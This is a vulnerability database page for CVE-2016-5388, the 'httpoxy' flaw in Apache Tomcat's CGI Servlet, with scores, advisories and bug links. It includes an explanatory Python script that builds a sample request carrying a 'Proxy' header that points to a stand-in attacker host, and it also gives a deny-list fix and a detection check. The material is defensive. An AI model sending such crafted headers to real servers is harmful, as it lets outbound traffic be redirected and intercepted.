CVE-2016-5388
Severity
8.1 HIGH
EPSS
36.8%
top 2.86%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
Timeline
Published: Jul 19
Latest update: May 13
Description
Apache Tomcat 7.x through 7.0.70 and 8.x through 8.5.4, when the CGI Servlet is enabled, follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an "httpoxy" issue. NOTE: the vendor states "A mitigation is planned for future releas…
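The mechanism behind the description, as an added example that is not Tomcat's code: RFC 3875 section 4.1.18 turns every request header into an HTTP_* environment variable, so a client-supplied "Proxy" header becomes HTTP_PROXY, which many HTTP client libraries read as the outbound proxy to use. The script below parses a constructed request, builds the CGI environment the vulnerable way and the hardened way (dropping the Proxy header before export), and includes a small check for flagging requests that would set HTTP_PROXY. Function and variable names, the sample request and the host names are assumptions made for the example.

```python
# Constructed sample request (not from the page): a CGI request that carries
# an attacker-supplied "Proxy" header.
SAMPLE_REQUEST = (
    b"GET /cgi-bin/fetch.sh HTTP/1.1\r\n"
    b"Host: victim.example\r\n"
    b"User-Agent: curl/7.64.0\r\n"
    b"Proxy: http://attacker.example:8080\r\n"
    b"\r\n"
)

# Request headers that must never be exported as HTTP_* meta-variables.
# "Proxy" is the httpoxy case: HTTP_PROXY is honoured by many HTTP client
# libraries as the outbound proxy to use.
BLOCKED_HEADERS = frozenset({"proxy"})


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, [(name, value), ...])."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return method, target, headers


def header_to_meta_variable(name):
    """RFC 3875 section 4.1.18: 'HTTP_' + header name in upper case with
    '-' replaced by '_'."""
    return "HTTP_" + name.upper().replace("-", "_")


def build_cgi_env(headers, blocked=frozenset(), base_env=None):
    """Build the CGI environment for a request.

    blocked=frozenset() reproduces the vulnerable RFC 3875 behaviour: every
    request header, including Proxy, becomes an HTTP_* variable.  Passing
    blocked=BLOCKED_HEADERS is the hardened form.  Variables already present
    in base_env (the server's own environment) are never overwritten by
    request headers, so a legitimately configured HTTP_PROXY survives.
    """
    env = dict(base_env or {})
    protected = set(env)
    for name, value in headers:
        if name.lower() in blocked:
            continue
        var = header_to_meta_variable(name)
        if var in protected:
            continue
        if var in env:
            # RFC 3875: repeated headers are combined with ", "
            env[var] = env[var] + ", " + value
        else:
            env[var] = value
    return env


def outbound_proxy(env):
    """What a CGI script's HTTP client would pick up: HTTP_PROXY, or None."""
    return env.get("HTTP_PROXY")


def request_sets_proxy_env(raw):
    """Detection helper: does this request carry a header that would map to
    HTTP_PROXY?  Suitable as a WAF rule or for scanning captured requests."""
    _method, _target, headers = parse_request(raw)
    return any(header_to_meta_variable(n) == "HTTP_PROXY" for n, _v in headers)


if __name__ == "__main__":
    _, _, hdrs = parse_request(SAMPLE_REQUEST)
    print("vulnerable:", outbound_proxy(build_cgi_env(hdrs)))
    print("hardened  :", outbound_proxy(build_cgi_env(hdrs, BLOCKED_HEADERS)))
```

The deny list is the minimal fix and is the one most web servers shipped for httpoxy; an allow list of headers that are actually needed by CGI scripts is the more robust design, since it also covers any future header name that collides with a variable a client library trusts. Blocking at the server is preferable to stripping the header at a reverse proxy, because the CGI servlet is the component that performs the unsafe mapping.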
CVSS vector
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploitability: 2.2 | Impact: 5.9
Affected Packages: 10 packages
Also affects: Enterprise Linux 7.2
Patches
Vulnerability Details (5)
Vendor Advisories (4)
Red Hat
Debian
CVE-2016-5388: tomcat9 - Apache Tomcat 7.x through 7.0.70 and 8.x through 8.5.4, when the CGI Servlet is ... (2016)
Community (4)
Bugzilla
CVE-2016-8647 Ansible: in some circumstances the mysql_user module may fail to correctly change a password (2016-11-17)
Bugzilla
CVE-2016-5388 Tomcat: CGI sets environmental variable based on user supplied Proxy request header [fedora-all] (2016-09-13)
Bugzilla
CVE-2016-5388 Tomcat: CGI sets environmental variable based on user supplied Proxy request header [epel-all] (2016-09-13)
Bugzilla
CVE-2016-5388 Tomcat: CGI sets environmental variable based on user supplied Proxy request header (2016-07-08)